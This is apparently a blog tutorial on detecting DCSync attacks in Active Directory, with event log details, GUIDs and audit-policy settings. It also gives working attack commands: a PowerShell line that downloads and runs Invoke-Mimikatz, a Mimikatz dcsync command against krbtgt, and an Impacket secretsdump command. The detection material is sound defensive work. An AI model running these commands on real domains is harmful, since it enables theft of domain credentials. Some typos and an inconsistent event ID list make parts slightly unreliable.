Table of Contents

  1. Abstract
  2. DCSync
    1. Description
    2. Getting Credentials
      1. Local
      2. Remote
    3. Detection
      1. Note

DCSync is a powerful tool in the hands of a red teamer and a nightmare for Blue teamers. For the blue teamer, this type of attack may not be feasible to stop, but it can be detected.

Abstract

Here I demonstrate how you can quickly and easily get detections in place DCSync. Begging with a brief overview of DCSync and a
quick guide on how to use it to get credentials. I then cover how to detect this type of attack and why I chose the route I did.
Finally, I provide references for further review.

DCSync

Description

DCSync works by requesting account password data from a Domain Controller. It can also ask Domain Controllers to replicate information using the Directory Replication Service Remote Protocol. What makes things worse it that DCSync can do this without running any code on a Domain Controller, unlike some of the other ways Mimikatz extracts password data. This attack takes advantage of a necessary function of Active Directory, meaning it cannot be turned off or disabled — leaving us to rely on detection.

Getting Credentials

I split this into two parts local and remote as the names suggest each of these sections covers how to run DCSync depending on if you want to run it locally or remote. To follow along, all one needs is a Windows Active Directory Domain Controller, and a few joined clients. If running DCSync remotely a separate machine with Impacket installed is needed.

Local

To run DCSync locally I will use Invoke-Mimikatz3.

On the Windows Domain Controller start up powershell and lets download Invoke-Mimikatz.

iex (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')

Once that has finished we can run DCSync with the following command.

Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt /domain:Win2016.local"'

For more information4.

Remote

To run DCSync remotely I will use secretsdump.py from Impacket5. I recomend creating an Impacket Docker image.

On the remote machine open a terminal/console and run the following. Don't forget to replace with a privliged user. Replace with the users
password and replace with the Domain Controllers IPAddress.

secretsdump.py -just-dc <user>:<password>@<ipaddress>

Detection

There are two ways to detect DCSync.

  • Network Monitoring1

    • DsGeNCChange
  • Event ID 6 , 7 , 8 , 9

    • 4462

For most people and environments Network Monitoring may not a realistic option leaving us with the Event ID. To detect DCSync with Event Id 4662 we want to
examine the value of the Properties field and see if it contains Replicating Directory Changes All, 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2, 9923a32a-3607-11d2-b9be-0000f87a36b2, or 1131f6ac-9c07-11d1-f79f-00c04fc2dcd2 anywhere in it.

 1  <?xml version="1.0" encoding="utf-8" standalone="yes"?>
 2  <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 3      <System>
 4          <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
 5          <EventID>4662</EventID>
 6          <Version>0</Version>
 7          <Level>0</Level>
 8          <Task>14080</Task>
 9          <Opcode>0</Opcode>
10          <Keywords>0x8020000000000000</Keywords>
11          <TimeCreated SystemTime="2018-06-06T12:01:41.388171400Z" />
12          <EventRecordID>6583</EventRecordID>
13          <Correlation />
14          <Execution ProcessID="472" ThreadID="592" />
15          <Channel>Security</Channel>
16          <Computer>Win2012r2.WIN2012R2.local</Computer>
17          <Security />
18      </System>
19      <EventData>
20          <Data Name="SubjectUserSid">S-1-5-21-1384719796-2249325780-1962070806-1001</Data>
21          <Data Name="SubjectUserName">vagrant</Data>
22          <Data Name="SubjectDomainName">WINDOMAIN</Data>
23          <Data Name="SubjectLogonId">0x38867</Data>
24          <Data Name="ObjectServer">DS</Data>
25          <Data Name="ObjectType">%{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
26          <Data Name="ObjectName">%{e3345764-2df3-459e-adb4-615a23cf4374}</Data>
27          <Data Name="OperationType">Object Access</Data>
28          <Data Name="HandleId">0x0</Data>
29          <Data Name="AccessList">%%7688</Data>
30          <Data Name="AccessMask">0x100</Data>
31          <Data Name="Properties">%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
32          <Data Name="AdditionalInfo">-</Data>
33          <Data Name="AdditionalInfo2" />
34      </EventData>
35  </Event>

In the example above we can see the Properties value is %%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9. This does contain one of the
strings we are looking for, 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2, making this is a positive match.

Not all machines have logging turned on for example Windows server 2016 the GPO will need to be set for loging this event Id. This is done by opening the Local Group Policy
Editor and going to Computer configurations > Windows Settings > Security Settings > Local Policies > Audit Policy. Right clicking on Audit directory service access and then
click on Properties. Check the box for Success and click Apply.

Note

On my Windows 2016 server the GPO keeps getting turned off. Searching I did find two10, 5 posts where people
were having issues similar to the one I am experiencing. Though in these article there was no sufficient answers.

Footnotes

1 Ad security: Mimikatz DCSync Usage, Exploitation, and Detection

2 Extracting User Password Data with Mimikatz DCSync

3 Invoke-mimikatz

4 harnj0y: mimikatz-and-dcsync-and-extrasids-oh-my

5 security auditing being turned off

6 gentilkiwi splunk

7 ultimatewindowssecurity

8 ultimatewindowssecurity2

9 modern-active-directory-attack-scenarios-and-how-to-detect-them

DCSync